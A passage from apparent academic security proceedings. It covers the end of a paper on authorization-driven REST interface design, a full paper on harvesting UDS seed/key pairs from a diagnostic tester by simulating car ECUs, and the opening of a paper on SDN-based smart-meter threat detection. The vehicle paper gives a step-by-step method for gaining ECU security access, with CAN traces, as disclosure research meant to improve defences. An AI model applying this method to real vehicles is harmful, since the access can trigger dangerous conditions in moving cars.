Regarding goal 6, the method is based on at least three assumptions. First, the authorization rules may be exposed to the users of the web service and, thus, also to attackers. This may be a threat for the web service or even a problem regarding federation. We assume that the system is secure even if attackers have this information, in accordance with Kerckhoffs's principle for crypto-systems [27]. Thus, this information may be exposed without making the web service insecure. Nevertheless, exposing the information may be impossible in some scenarios. In this case, the web service operation names have to be obfuscated, or the introduced method cannot be applied.
The second assumption is that the number of authorization rules for a single web service does not grow too large. The policies defined by ABAC can be fine-grained, using complex expressions. With our approach, every such fine-grained policy leads to at least one service interface operation. In large systems, this may cause considerable overhead: many operations with potentially long names could be introduced. For example, operations with similar functionality need a common internal method to avoid redundancy, and more methods and tests have to be implemented by the developers.
The third assumption raised by goal 6 is that the authorization rules do not change periodically or often. A change in the authorization rules may lead to changes in the web service operations and can, when using the method, cause changes in systems using the web service. This depends on the change and on the mapping of the abstract interface to the technology-dependent web service interface. In our REST mapping, the URL does not change, but a new parameter value may be introduced. In this case, changing authorization rules do not lead to changes in systems using the web service. Even so, the web service has to be adapted, which entails overhead.
Additionally, the approach introduced is systematic, but we have not used a language to describe access control policies, because we could not find a suitable one. Possible candidates are the Unified Modeling Language with SecureUML [4] and UMLsec [25], or the Ponder Policy Specification Language (PPSL) [26]. However, UMLsec and SecureUML would need to be enhanced to support every kind of authorization. PPSL is not based on the UML and has no visual representation, but we consider both to be important prerequisites for adoption of the approach.
Another limitation concerning REST is the restricted functionality of HTTP's OPTIONS method. An OPTIONS call to a resource is answered with a list of allowed methods on that resource, and using one of them should not result in a 405 Method Not Allowed error code. However, after applying this paper's approach, the method name alone is not sufficient to formulate valid requests – information about valid authorization parameter values is required as well (see Section III). The response is expressed as a list of comma-separated HTTP methods, and there seems to be no possibility to additionally provide parameter values.
VI. CONCLUSION AND FUTURE WORK
We introduced a new way of designing interface methods by using security patterns. For this method, we showed that the attack surface of the interface is minimized according to the least privilege needed. Additionally, we showed how to combine the method with the REST paradigm and thereby create REST-compliant web services.
The application of the method was shown within the Participation Service of the KIT-SC. In this application, the disadvantage of creating many interface methods through our approach became apparent. However, the attack surface has been reduced. By giving a mapping from the technology-independent web service to a RESTful web service, the approach facilitates a REST-compliant Participation Service.
The approach gives software architects the possibility to improve the security of web services using authorization patterns. They can follow instructions to improve quality attributes of the application in a systematic way without having a security background or knowledge.
Software developers using the derived service interface are aware of the privileges required when using interface methods. This increases security in the sense of secure interaction design. Furthermore, the implementation of the service interface can be tested more easily, because the authorization provides constraints for the operation to be implemented.
The disadvantage of creating many service interface methods may be the focus of future work. For instance, this phenomenon could be avoided by combining similar rights for the same object into one service interface method. Another starting point for future work is to research the advantages of static as opposed to dynamic access decisions. This can lead to improved performance, improved security through easier testing, and easier externalization of access decisions.
Our main goal is to combine the usage of security patterns with quality attributes. This can lead to more precise predictions of software quality. Thereby, non-functional requirements of stakeholders can be considered during the design of an application. By offering systematic methods, quality can be ensured across the phases of software development.
REFERENCES
[1] G. McGraw, "Software Security," IEEE Security & Privacy, pp. 80-83, Mar.-Apr. 2004, doi:10.1109/MSECP.2004.1281254.
[2] M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F. Buschmann, and P. Sommerlad, "Security Patterns: Integrating Security and Systems Engineering," John Wiley & Sons, Dec. 2005, ISBN: 978-0-470-85884-4.
[3] B. Alshammari, C. Fidge, and D. Corney, "Security Metrics for Object-Oriented Designs," 21st Australian Software Engineering Conference (ASWEC), Apr. 2010, pp. 55-64, doi:10.1109/ASWEC.2010.34.
[4] D. Basin, J. Doser, and T. Lodderstedt, "Model Driven Security: from UML Models to Access Control Infrastructures," ACM Transactions on Software Engineering and Methodology (TOSEM), vol. 15, Jan. 2006, pp. 39-91, doi:10.1145/1125808.1125810.
[5] P. Manadhata, K. Tan, R. Maxion, and J. Wing, "An Approach to Measuring A System's Attack Surface," Carnegie Mellon University, Aug. 2007. [Online]. Available from: http://www.dtic.mil/cgi-bin/GetTRDoc?Location=U2&doc=GetTRDoc.pdf&AD=ADA476805 [retrieved: 23.09.2014]
[6] B. Alshammari, C. Fidge, and D. Corney, "Security Metrics for Object-Oriented Class Designs," 9th International Conference on Quality Software, Aug. 2009, pp. 11-20, doi:10.1109/QSIC.2009.11.
[7] T. Heumann, J. Keller, and S. Türpe, "Quantifying the Attack Surface of a Web Application," in Proceedings of Sicherheit 2010, vol. 170, 2010, pp. 305-316, ISBN: 978-3-88579-264-2.
[8] G. Sumit, R. K. Nabanita, Mukesh, S. Saurabh, and M. Pallavi, "Reducing Attack Surface of a Web Application by Open Web Application Security Project Compliance," Defence Science Journal, vol. 62(5), Sep. 2012, pp. 324-330, doi:10.14429/dsj.62.1291.
[9] M. Howard, "Attack Surface – Mitigate Security Risks by Minimizing the Code You Expose to Untrusted Users," MSDN Magazine, Nov. 2004. [Online]. Available from: http://msdn.microsoft.com/en-us/magazine/cc163882.aspx [retrieved: 23.09.2014]
[10] A. Kurmus, A. Sorniotti, and R. Kapitza, "Attack Surface Reduction For Commodity OS Kernels: trimmed garden plants may attract less bugs," in Proceedings of the Fourth European Workshop on System Security (EUROSEC '11), Apr. 2011, pp. 1-6, doi:10.1145/1972551.1972557.
[11] A. Bartel, J. Klein, and M. Monperrus, "Automatically Securing Permission-Based Software by Reducing the Attack Surface: An Application to Android," in Proceedings of the 27th IEEE/ACM International Conference on Automated Software Engineering (ASE 2012), Sep. 2012, pp. 274-277, doi:10.1145/2351676.2351722.
[12] K. Yee, "Guidelines and Strategies for Secure Interaction Design," in Security and Usability: Designing Secure Systems That People Can Use, pp. 247-273, Aug. 2005, ISBN: 978-0-596-00827-7.
[13] R. Fielding, "Architectural Styles and the Design of Network-based Software Architectures," Dissertation, University of California, Irvine, 2000, ISBN: 0-599-87118-0.
[14] M. Gebhart, P. Giessler, and P. Burkhardt, "Quality-Oriented Requirements Engineering for Agile Development of RESTful Participation Service," in press.
[15] E. Yuan and J. Tong, "Attribute Based Access Control (ABAC) for Web Services," in Proceedings of the International Conference on Web Services (ICWS), Jul. 2005, pp. 561-569, doi:10.1109/ICWS.2005.25.
[16] ISO/IEC, "ISO/IEC 25010:2011(E) Systems and software engineering – Systems and software Quality Requirements and Evaluation (SQuaRE) – System and software quality models," 2011.
[17] R. Steinegger, "Authentication and authorization patterns in existing security frameworks [Authentifizierungs- und Autorisierungsmuster in bestehenden Sicherheits-Frameworks]," diploma thesis, Karlsruhe Institute of Technology, Karlsruhe, Germany, 2012. In German.
[18] C. Pautasso and E. Wilde, "Why is the Web Loosely Coupled? A Multi-Faceted Metric for Service Design," in Proceedings of the 18th International Conference on World Wide Web (WWW '09), Apr. 2009, pp. 911-920, doi:10.1145/1526709.1526832.
[19] A. Caballero, "Computer and Information Security Handbook," Morgan Kaufmann Publishers, 2009, ISBN: 978-0123743541.
[20] W3C, "Web Services Glossary," Feb. 2004. [Online]. Available from: http://www.w3.org/TR/2004/NOTE-ws-gloss-20040211/#webservice [retrieved: 23.09.2014]
[21] L. Richardson and S. Ruby, "RESTful Web Services," O'Reilly Media, May 2007, ISBN: 978-0596529260.
[22] ISO/IEC, "ISO/IEC 25000:2005(E) Software Engineering – Software Product Quality Requirements and Evaluation (SQuaRE) – Guide to SQuaRE," 2005.
[23] S. Cohen, "Ontology and Taxonomy of Services in a Service-Oriented Architecture," Microsoft Architect Journal, Apr. 2007.
[24] A. van Kesteren, "HTTP methods, Web browsers and XMLHttpRequest," Oct. 2007. [Online]. Available from: http://annevankesteren.nl/2007/10/http-method-support [retrieved: 23.09.2014]
[25] J. Jürjens, "UMLsec: Extending UML for Secure Systems Development," Lecture Notes in Computer Science, vol. 2460, pp. 412-425, Sep. 2002, doi:10.1007/3-540-45800-X_32.
[26] N. Damianou, N. Dulay, E. Lupu, and M. Sloman, "The Ponder Policy Specification Language," in Proceedings of the International Workshop on Policies for Distributed Systems and Networks (POLICY '01), Jan. 2001, pp. 19-37, ISBN: 3-540-41610-2.
[27] A. Kerckhoffs, "La cryptographie militaire," Journal des sciences militaires, vol. IX, Jan. 1883, pp. 5-38.
Evaluation of Vehicle Diagnostics Security –
Implementation of a Reproducible Security Access
Martin Ring, Tobias Rensen and Reiner Kriesten
University of Applied Sciences Karlsruhe
Karlsruhe, Germany
Emails: {rima0003, reto1014, krre001}@hs-karlsruhe.de
Abstract—Modern cars typically possess a network of
numerous Electronic Control Units (ECUs) which are
connected with each other by several bus systems. In
addition to the necessary on-board communication by
means of which the ECUs exchange information without
any influence from outside, there is a strong need for interaction with off-board systems. In this context, the vehicle
diagnostics can be mentioned as a significant example. It
is highly important that the connection between diagnostic
testers and the car is secured against unauthorized access.
This paper examines the development of a procedure as well as a software tool for gaining reproducible access to individual car ECUs without any professional testers. If this access can be achieved by self-developed tools, a potential security risk exists, as malicious diagnostic routines (not existing in professional car testers) can be activated by using this access. If the ways to achieve this access are known, it is possible to work on improving the defence.
Keywords–security access; safety; diagnostics security;
data busses; communication standard.
I. INTRODUCTION
The increasing number of vehicle electronics [8] in modern cars leads to a permanently rising focus on safety and security aspects. Whereas safety can be described as the property that the vehicle acts adequately in critical situations, security addresses the robustness of the car system against attacks from outside.
Concerning safety issues, the International Organization for Standardization (ISO) has released the automotive-specific standard ISO 26262 [17]. However, the standardization of security issues has not yet reached the same level.
The connectivity of modern cars to the outside world is an especially critical factor. Use cases like diagnostics exchange, navigation information, interaction with mobile devices and personalized services can easily be found [3][4][5][12].
The easiest way to interact with the automotive network is via the On-Board Diagnostics (OBD) connector. This connector serves as central access to all ECUs available in a car. For safety-critical diagnostic functions, a so-called security access is implemented in the diagnostics standard [18].
We investigated whether a self-written program can reliably achieve security access to modern vehicles by means of seed and key methods. Figure 4 describes the principles behind this practice. After a security request from the tester, a random number, a so-called seed, is sent back from the vehicle ECU. Afterwards, the tester performs a secret coding algorithm and sends back the calculated key, which is evaluated in the ECU [18]. The respective approach can be briefly described as follows:
• Recording of the security access between vehicles and testers in order to obtain the overall protocol sequence and information.
• Implementing a software tool which replaces the car and requests keys from the tester in order to obtain the possible seed and key pairs.
• Testing the seed and key pairs for their reliable use. This implies in particular that they are independent of date, vehicle and ECU-specific information like the Vehicle Identification Number (VIN).
Before the diagnostic data can be analysed, it is important to know how to interpret the payload of a CAN message, which is described in Section III. Section IV describes the fundamentals needed to simulate an ECU. The simulation of the ECU is described in Section V. Lastly, Section VI shows the analysis of the key exchange and which parameters are significant for its calculation.
II. RELATED WORK
Only a small number of scientific publications are available on this subject. In particular, works focusing on a reliable procedure for gaining security access to the ECUs/network of an arbitrary car are rare. The related works [3][4][5][12] mainly describe how to provoke a security hazard by means of additional components or self-programmed code executed on existing components. This paper examines the possibility of provoking a hazardous situation by gaining access to the corresponding software implementations, e.g., the ventilation of the Anti-lock Braking System (ABS) unit.
III. BASICS ON AUTOMOTIVE EMBEDDED SYSTEMS
This section describes the fundamentals of embedded automotive systems needed for understanding this paper.
A. Vehicle network: lower protocol layers
1) Electric architecture: Modern cars possess several bus systems for the communication between the ECUs, sensors and actuators. According to the AUTOSAR standard [14], these devices are categorised into multiple networks, like the body and comfort network, the powertrain network or the infotainment network; see Figure 1. The choice of the underlying bus system further depends on the necessary data rate, cost aspects, real-time abilities, etc. However, the Controller Area Network (CAN) bus [16] is still the most popular bus in modern vehicles. As the diagnostics protocol is usually embedded in the CAN bus protocol, the latter is described in more detail in the following paragraph.
Figure 1. Vehicle network example: a diagnostic tester connects via the OBD interface to a central gateway, which links the powertrain bus (CAN), the body & comfort bus (CAN, LIN) and the infotainment bus (CAN, FlexRay, MOST).

Figure 2. CAN packet structure [4]: header (SOF, identifier, RTR, IDE, r, DLC), data field (0-8 bytes), trailer (CRC sequence, DEL, ACK, DEL, EOF).

Figure 2 shows the structure of a CAN message according to the standard ISO 11898. The most important parts of the message regarding diagnostic messages are the ID field, containing the address of the ECU, and the diagnostic payload located in the data field.
B. Transport protocol
The transport protocol is standardized in the ISO
15765-2 [19] and is used for diagnostic purposes. This
protocol is located one layer above the CAN protocol
and allows upper services to transmit information
with a data length of possibly more than 8 byte. The
information of the Transport Protocol (TP) found in the
most significant bytes of the CAN data field. These bytes
are called Protocol Control Information (PCI). There
are four different types of messages, the first nibble of
the CAN data field contains the type information [5][11].
0h  Single frame: contains the entire payload (less than 8 bytes). The second nibble indicates how much data the packet contains.
1h  First frame: the first frame of a multi-packet payload. The next three nibbles contain the length of the whole diagnostic data.
2h  Consecutive frame: contains the rest of the multi-packet payload. The second nibble contains the sequence number of the sent message.
3h  Flow control frame: sent from the receiver of the multi-packet payload, after the first frame [11].
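The PCI nibble decoding above can be sketched as follows; the function and constant names are ours, not part of the standard:

```python
# Sketch: classify an ISO 15765-2 frame by the first PCI nibble of the
# CAN data field and extract the associated length/sequence information.

FRAME_TYPES = {0x0: "single", 0x1: "first", 0x2: "consecutive", 0x3: "flow_control"}

def decode_pci(data):
    """data: CAN data field as a list of byte values."""
    frame_type = FRAME_TYPES[data[0] >> 4]
    if frame_type == "single":
        return frame_type, data[0] & 0x0F               # payload length
    if frame_type == "first":
        # The next three nibbles (12 bits) hold the total payload length.
        return frame_type, ((data[0] & 0x0F) << 8) | data[1]
    if frame_type == "consecutive":
        return frame_type, data[0] & 0x0F               # sequence number
    return frame_type, None                             # flow control

# A first byte of 02h marks a single frame with two diagnostic data bytes.
print(decode_pci([0x02, 0x10, 0x92]))   # ('single', 2)
print(decode_pci([0x10, 0x14, 0x62]))   # ('first', 20)
```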
2) Information CAN bus: The CAN bus is the most popular bus system in modern vehicles. In the U.S., it has even been the standard for OBD diagnostics since 2008. Regarding the physical characteristics, it uses differential data transmission in order to resist electrical disturbances (to be seen as a safety feature) and allows data rates of up to 500 kbit/s [4].

C. Vehicle networks: upper protocol layers
1) Diagnostic protocol standards (Application Layer): There are two popular diagnostic protocols: one is the Keyword Protocol (KWP) 2000, which is standardized in ISO 9141 and ISO 14230; the other one is the Unified Diagnostic Services protocol (UDS) [18], which is standardized in ISO 14229. The operation of both diagnostic protocols is almost identical. KWP 2000 was
originally designed for the proprietary bus system K-Line and is not used in modern cars anymore. Both protocols work with Service Identifiers (SID). Every SID represents a different action of an ECU, which can be specified by its LEVs (subfunction levels); see Figure 3. The provided services are defined in the standards.

Figure 3. UDS diagnostic protocol [13]:
Service Request:    SID          | LEV (subfunction) | request parameters
Service Response:   SID | 40h    | LEV (subfunction) | response parameters
Negative Response:  7Fh (byte 1) | SID (byte 2)      | error code (byte 3)

The services can be selected by the SID and LEV. These two bytes are the first two diagnostic data bytes of the message. There are three types of messages:
• The request message. This message is sent by the tester with the desired service.
• The response message. This message is sent from the ECU. The SID of the response message is calculated by logically OR-linking the SID of the request message with 40h (e.g., 27h | 40h = 67h).
• The error message. It starts with 7Fh, which is followed by the SID of the request and an error code with a length of one byte, as seen in Figure 3.

The control units communicate only after receiving a request from the diagnostic tester. There is a clear distribution of roles, in which the tester assumes the role of the client and the control unit works as the server. This communication principle is also called request and response.

D. Security Access in the diagnostic protocol
Today's security access is defined in the UDS standard. To access safety-critical functions, the tester asks the ECU for a seed. After receiving this seed, the tester computes the corresponding key, which is sent back to the ECU. If the received key is consistent with the expected key, access is granted [13]. Seed and key lengths, as well as the algorithm to compute the key, are not specified in the standard. Every vehicle manufacturer can implement an arbitrary seed length and algorithm. It is also not standardized whether the seed is static or alternating. If the security access is used, the standard specifies that there are special LEVs to send the request for a seed and special LEVs for sending the key. All those subfunction levels can be found in the security access service (SID: 27h):

requestSeed: LEV 01h, 03h, 05h, 07h - 5Fh
sendKey:     LEV 02h, 04h, 06h, 08h - 60h [19]

The process of the security access is shown in Figure 4.

Figure 4. Security access timing sequence [11]:
Tester → ECU: 27 01                (request SecurityAccess, request seed)
ECU → Tester: 67 01 12 34 56 78    (positive response, send seed)
              [tester performs the key calculation]
Tester → ECU: 27 02 9A BC DE F0    (request SecurityAccess, send key)
ECU → Tester: 67 02                (positive response, access granted)
The message structure of the diagnostic messages
from the tested vehicles follows the standardized protocols (with a few exceptions). The first byte of a single
message contains the information about the transport
protocol. In the message (listed below), the value is 02h .
The zero (first nibble) stands for a single message and
the two (second nibble) for two diagnostic data bytes.
The second byte contains the SID and the third is the
LEV (service and subfunction).
Tester request data: 02 10 92 00 00 00 00 00
ECU response data: 02 50 92 38 37 30 32 39
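The nibble layout of that first transport protocol byte can be decoded mechanically. The helper below is a sketch for the single-frame case only; the field names in the returned dictionary are our own.

```python
def decode_single_frame(frame):
    """Decode a diagnostic single frame: the high nibble of the first
    byte is the frame type (0 = single frame) and the low nibble the
    number of diagnostic data bytes; SID and LEV follow."""
    frame_type = frame[0] >> 4
    length = frame[0] & 0x0F
    if frame_type != 0:
        raise ValueError("not a single frame")
    payload = frame[1:1 + length]
    return {"sid": payload[0],
            "lev": payload[1] if length > 1 else None,
            "data": payload[2:]}

# The tester request above: 02h -> single frame with two data bytes.
request = decode_single_frame(bytes.fromhex("0210920000000000"))
```

For the tester request this yields SID 10h and LEV 92h; the corresponding ECU response carries SID 50h, i.e., 10h | 40h.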
IV. TECHNICAL ACCESS SETUP FOR THE SECURITY EVALUATION
This section describes the physical setup used to measure and record the diagnostic communication, and the strategy for decoding the messages according to the given UDS standard.
In order to record the communication between the
tester and individual vehicles, an additional client was
added to the diagnostics line, a bus analysis tool running
on the attached PC; see Figure 5 [15].
Thus, the existing communication between different
cars and the tester could be easily recorded. In the second
step the bus analysis tool was used for the simulation of
the car. To be more precise, the bus analysis tool provides the messages which originally came from the real car; see Figure 6. It further has to be noted that there is a reason for simulating the vehicle and not the tester: while there are only a few attempts for the security access to car ECUs (afterwards, they deny any further access), professional testers can be stimulated an infinite number of times, as in a typical environment they have to serve numerous vehicles and have to be permanently available.

[Figure 5 shows the recording setup: a CAN interface on the attached PC is connected via the OBD connector between the tester and the vehicle network.]
Figure 5. Recording strategy for diagnostics communication.

[Figure 6 shows the simulation mode: the bus analysis program is connected directly to the tester.]
Figure 6. Simulation mode.

Table I shows an exemplary protocol sequence at the beginning of a security session. First, a handshake between the tester and the ECU is initiated by the tester, including the exchange of specific ECU information. Afterwards, the seed and key messages appear for the authorization of the security access. In this context, it has to be mentioned that most of the message data is standardized according to the UDS protocol.

TABLE I. COMMUNICATION FROM BEGIN TO SECURITY ACCESS.

CAN Data                  description       sent from
02 10 92 00 00 00 00 00   session request   tester
02 50 92 FF FF FF FF FF   session response  ECU
02 1A 87 00 00 00 00 00   session ECU info  tester
10 16 5A 87 01 22 05 14   send ECU Info1    ECU
30 08 28 00 00 00 00 00   send other parts  tester
21 FF 07 09 09 43 00 32   send ECU Info2    ECU
22 30 34 35 34 35 33 38   send ECU Info3    ECU
23 33 32 FF FF FF FF FF   send ECU Info4    ECU
02 3E 01 00 00 00 00 00   tester present    tester
02 7E 00 00 00 00 00 00   tester present    ECU
02 27 01 00 00 00 00 00   Security req.     tester
05 67 01 F0 5E 00 00 00   send Seed         ECU
04 27 02 92 16 00 00 00   send Key          tester
03 67 02 34 00 00 00 00   pos. access       ECU

A. Vehicle selection
The choice of the investigated vehicles was influenced by the fact that, since 2008, cars offer the UDS protocol, typically embedded within the CAN bus. Considering these limiting conditions, six vehicles produced by four different manufacturers were randomly chosen.
As a first result, it was not possible to perform
a security access for one specific car platform as the
corresponding services have not been implemented in
the tester. In this case, only diagnostic routines which do
not rely on the security access could be executed, e.g.,
reading/deleting error codes. Regarding all other tested
car manufacturers, the security access could be recorded.
To proceed, emphasis was put on two different cars of
one manufacturer. The reason for this decision is mainly
that this manufacturer implemented the security access
according to the UDS standard. The security access was not implemented by all tested manufacturers, even though there is a standard [18] which recommends this access for certain safety-critical functions; access to these vehicles was unlimited.
B. Use cases for the execution of the security access
Table I displays the dial-up of the connection and the
exchange of the seed and key data. Both the seed and the key are two bytes long, which is car-specific and not prescribed by the standard. For both tested vehicles of
this brand, the dial-up connection between the tester and
the vehicle and also the security access are identical to
the one shown in Table I, only the seeds, keys and ECU
information differ. In the first vehicle, the security access
appeared in the ABS ECU after selecting a specific safety
function of this ECU. For non-safety-relevant diagnostic
functions there was a request for the security access from
the tester; see Table II. In this case, however, the ECU obviously did not insist on the secure access, which affects the protocol sequence in the following way: the ECU sends zero bytes as seed data (no security access needed) and is likewise answered with zero bytes as the key from the tester.
TABLE II. SECURITY ACCESS WITH ZERO BYTES.

CAN Data                  description         sent from
02 27 01 00 00 00 00 00   Security req.       tester
05 67 01 00 00 00 00 00   send zeros          ECU
04 27 02 00 00 00 00 00   send zeros for key  tester
03 67 02 34 00 00 00 00   pos. access         ECU
V. ECU SIMULATION FOR A REPRODUCIBLE SECURITY ACCESS
We implemented the communication behaviour of
both ECUs (ABS / Airbag) existing in the different
vehicles of which a security access was recorded; see
Figure 5. The GUI of the simulation allows the selection
of a car and the desired ECU. If a security access has been successfully performed, the GUI displays a notification and the seed and key data used; see Figure 7.
The seeds sent to the tester are arbitrarily chosen by the simulation program, so 2^16 = 65536 seed and key pairs exist due to the 16-bit seed length. Furthermore, the seeds can be written to a text file before starting the simulation.
After all seeds have been sent, the program generates a new file which stores the used seeds and their received keys. As already mentioned, the data exchange works
only on request, which means that the whole simulation
is controlled by the diagnostic tester.
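The logging loop of such a simulation can be sketched as follows. The sketch is illustrative: `query_tester` is a hypothetical callback standing in for the real tester round-trip, and the file format is our own choice.

```python
import random

def run_simulation(query_tester, n_bits=16, out_path="seed_key_log.txt"):
    """Hand every possible seed to the tester once, in random order,
    and log the seed/key pairs the tester answers with."""
    seeds = list(range(2 ** n_bits))
    random.shuffle(seeds)                    # seeds are arbitrarily chosen
    with open(out_path, "w") as log:
        for seed in seeds:
            key = query_tester(seed)         # blocks until the tester replies
            log.write(f"{seed:04X} {key:04X}\n")
    return len(seeds)
```

With `n_bits=16` this enumerates all 65536 pairs; since the exchange is request-driven, the real pace is dictated by the tester, not by this loop.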
Figure 7. Panel for handling the ECUs and the security access.

VI. SECURITY ACCESS ANALYSIS

In order to implement a tool which can reliably unlock different vehicles of the same model, it has to be analysed whether the key algorithm is reproducible. This implies, in particular, independence of the actual time and of vehicle-specific values such as the Vehicle Identification Number (VIN). In the following, the key algorithm is evaluated regarding its independence of date, VIN and ECU data.

A. Date independence

The same seed was sent to the tester twice on different days. Each time, the received key was identical. This shows that the key calculation is independent of date and time. Surely, this behaviour could be anticipated, as it is unlikely that both vehicle and tester share the same timebase and use it for the seed/key calculation.

B. VIN independence

In the tester, a VIN can be selected in order to determine the associated car. Therefore, one could assume that the seed and key data depend on the VIN. Thus, the traffic between the tester and the ECU was analysed, and no VIN information was found. Furthermore, the tester was provided with two different VINs and access was requested using the same seed. As a result, the keys again did not differ. To conclude, the security access is independent of the VIN.

C. Independence of ECU-specific data

In order to assure that the key depends only on the given seed, it is necessary to prove that the ECU-specific information does not change the key data. Again, the simulation program requested keys twice while changing the ECU-specific data; see Table III. Once more, the expected independence could be confirmed.

TABLE III. CHANGED ECU INFORMATION.

CAN Data                  description     sent from
10 16 5A 87 01 22 05 14   send ECU Info1  ECU
21 FF 07 09 09 43 00 32   send ECU Info2  ECU
22 30 34 35 34 35 33 38   send ECU Info3  ECU
23 33 32 FF FF FF FF FF   send ECU Info4  ECU

VII. CONCLUSION AND FUTURE PROSPECTS
Evaluating the communication between modern vehicles and diagnostic testers enabled us to develop a
software tool which grants security access to special
electronic control units of modern vehicles. Using the
developed software tool it was possible to extract the
keys from the tested cars semi-automatically. As the respective process is not conducted fully automatically, the
extraction of all keys for 16-bit seed and key pairs would
take approximately 110 working hours. This workload
could be reduced by an additional automation of the
tester handling. It is also possible to generate a program
which determines the possible algorithms of a given
input and output vector. In a test run, only 50 pairs were
needed to determine the respective algorithm. The fact
that it was possible to achieve security access can be considered crucial, because this access can be used to cause security-critical and therefore dangerous conditions or unintended actions while the vehicle is in motion. Thus, it is recommended to improve the defence.
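The brute-force idea mentioned above, determining a candidate algorithm from recorded input/output pairs, could look like the sketch below. The candidate family (XOR or ADD with a 16-bit constant) is purely illustrative and not the actual search space used in the paper.

```python
# Candidate seed-to-key transforms over 16-bit values (illustrative only).
CANDIDATES = {
    "xor_const": lambda seed, c: seed ^ c,
    "add_const": lambda seed, c: (seed + c) & 0xFFFF,
}

def find_algorithm(pairs):
    """Return (name, constant) of the first candidate reproducing all
    recorded (seed, key) pairs, or None if no candidate matches."""
    for name, fn in CANDIDATES.items():
        for const in range(0x10000):
            if all(fn(seed, const) == key for seed, key in pairs):
                return name, const
    return None
```

Because each mismatching pair eliminates a candidate immediately, a handful of recorded pairs usually pins down a unique transform, consistent with the roughly 50 pairs reported above.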
REFERENCES
[1] K. Beiter, C. Rätz, and O. Garnatz, "Gesetzliche On-Board-Diagnose und ODX (Statutory On-Board Diagnostics and ODX)." [Online]. Available: http://vector.com/portal/medien/diagnostics/odx/Gesetzliche OnBoard Diagnose und ODX.pdf [retrieved: 2014.07.21]
[2] K. Borgeest, Elektronik in der Fahrzeugtechnik (Electronics in Vehicle Technology). Vieweg Verlag, 2007.
[3] S. Checkoway, D. McCoy, B. Kantor, D. Anderson, H. Shacham, and S. Savage, "Comprehensive Experimental Analyses of Automotive Attack Surfaces." [Online]. Available: http://www.autosec.org/pubs/cars-usenixsec2011.pdf [retrieved: 2014.07.21]
[4] K. Koscher, A. Czeskis, F. Roesner, S. Patel, and T. Kohno, "Experimental Security Analysis of a Modern Automobile," in 2010 IEEE Symposium on Security and Privacy, 2010. [Online]. Available: http://www.autosec.org/pubs/cars-oakland2010.pdf [retrieved: 2014.07.21]
[5] C. Miller and C. Valasek, "Adventures in Automotive Networks and Control Units." [Online]. Available: http://illmatics.com/car hacking.pdf [retrieved: 2014.07.21]
[6] T. Nosper, "Controller-Area-Network." [Online]. Available: http://www.hs-weingarten.de/nosper/public/Download/Kapitel202.720CAN-Neues20Layout.pdf [retrieved: 2014.07.21]
[7] K. Reif, Automobilelektronik (Automotive Electronics). Vieweg + Teubner Verlag, 2012.
[8] H. Richter, "Elektronik und Datenkommunikation im Automobil (Electronics and Data Communication in Automotive Applications)," Institut für Informatik, Technische Universität Clausthal, Tech. Rep. [Online]. Available: http://www.in.tu-clausthal.de/fileadmin/homes/techreports/ifi0905richter.pdf [retrieved: 2014.07.21]
[9] F. Schäfer, OBD Fahrzeugdiagnose in der Praxis (OBD Vehicle Diagnosis in Practice). Franzis Verlag, 2012.
[10] T. Strang and M. Röckl, "Vehicle Networks: CAN-based Higher Layer Protocols," 2008. [Online]. Available: http://www.sti-innsbruck.at/sites/default/files/courses/fileadmin/documents/vn-ws0809/03-vn-CAN-HLP.pdf [retrieved: 2014.07.21]
[11] J. Supke and W. Zimmermann, "Diagnosesysteme im Automobil (Diagnostic Systems in Automobiles)." [Online]. Available: http://www.emotive.de/documents/WebcastsProtected/Transport-Diagnoseprotokolle.pdf [retrieved: 2014.07.21]
[12] M. Wolf, A. Weimerskirch, and T. Wollinger, "State of the Art: Embedding Security in Vehicles," EURASIP Journal on Embedded Systems, April 2007. [Online]. Available: http://downloads.hindawi.com/journals/es/2007/074706.pdf [retrieved: 2014.07.21]
[13] W. Zimmermann and R. Schmidgall, Bussysteme in der Fahrzeugtechnik (Bus Systems in Automotive Engineering). Vieweg Verlag, 2007.
[14] Release 4.1 Overview and Revision History, AUTOSAR Std. [Online]. Available: http://www.autosar.org/fileadmin/files/releases/4-1/AUTOSAR TR ReleaseOverviewAndRevHistory.pdf [retrieved: 2014.07.21]
[15] Handbuch CANoe (CANoe Manual), Vector Informatik GmbH.
[16] ISO 11898 CAN, ISO Std.
[17] ISO 26262 Safety, ISO Std.
[18] ISO 14229 Unified Diagnostic Services (UDS), ISO Std.
[19] ISO 15765-3 Implementation of Unified Diagnostic Services (UDS on CAN), ISO Std.
[20] CAPL Function Reference Manual, Vector Informatik GmbH, November 2004.
[21] Programming with CAPL, Vector Informatik GmbH, December 2004.
An AMI Threat Detection Mechanism Based on SDN Networks
Po-Wen Chi∗ , Chien-Ting Kuo∗† , He-Ming Ruan∗, Shih-Jen Chen† , and Chin-Laung Lei∗
∗Department of Electrical Engineering, National Taiwan University, Taipei, Taiwan
Email: {d99921015, d98921027, d97921030, cllei}@ntu.edu.tw
† CyberTrust Technology Institute, Institute for Information Industry, Taipei, Taiwan
Email: {ctkuo, sjchen}@iii.org.tw
Abstract—The security of Advanced Metering Infrastructure (AMI) systems draws more and more attention nowadays. Intrusion detection systems are often deployed on the backhaul network to protect the AMI head-end system. In this paper, we propose an efficient way to build a threat detection mechanism for AMI systems with the help of software-defined networking (SDN). Moreover, we enhance the OpenFlow architecture to provide a more powerful detection mechanism to secure the AMI system. The proposed solution not only enhances the security of AMI systems, but also preserves the traffic quality of the infrastructure.
Keywords–AMI; SDN; Specification-based detection
I. INTRODUCTION
Recently, the AMI system, which plays a key role in the Smart Grid, has become popular due to the benefits it can bring.
This new infrastructure enables the exploration of the possibilities of energy utilization by providing certain communication
and control functionalities. However, while providing various benefits, AMI introduces new security challenges due to semi-open networks, improper security mechanisms and immature hardware design for AMI devices. Many studies have already examined security issues in AMI systems, such as [1][2]. The essence of AMI is a vast and distributed
sensor system tethered by the backhaul network and some
neighborhood area networks (NANs), which can be open networks
or closed ones. It implies that anyone on the backhaul might
find their way to interfere with the AMI, especially the Internet
service providers (ISPs) who can possibly control partial or all
of the connections in an AMI system. Thus, we will focus on
the security issue in the backhaul network in this paper.
Traditional approaches to protect a device in an IT system
could be cryptographic tools such as mutual authentication
that ensures the identities of each end in a communication,
encryption and key management, which enforces the access
control over specific storage media, or digital signature, which
guarantees the source of a message. However, any of the
cryptographic measures require relatively powerful hardware,
and this implies that the cost of devices will be anything but
cheap. But the extremely large scale of AMI systems limits
the budget of the devices, and further constrains the capability
of the devices and the available protection approaches. Under
such dire condition, monitoring the security status of the AMI
system becomes a practical and economical solution. With the
status of the system security at hand, one can then address and
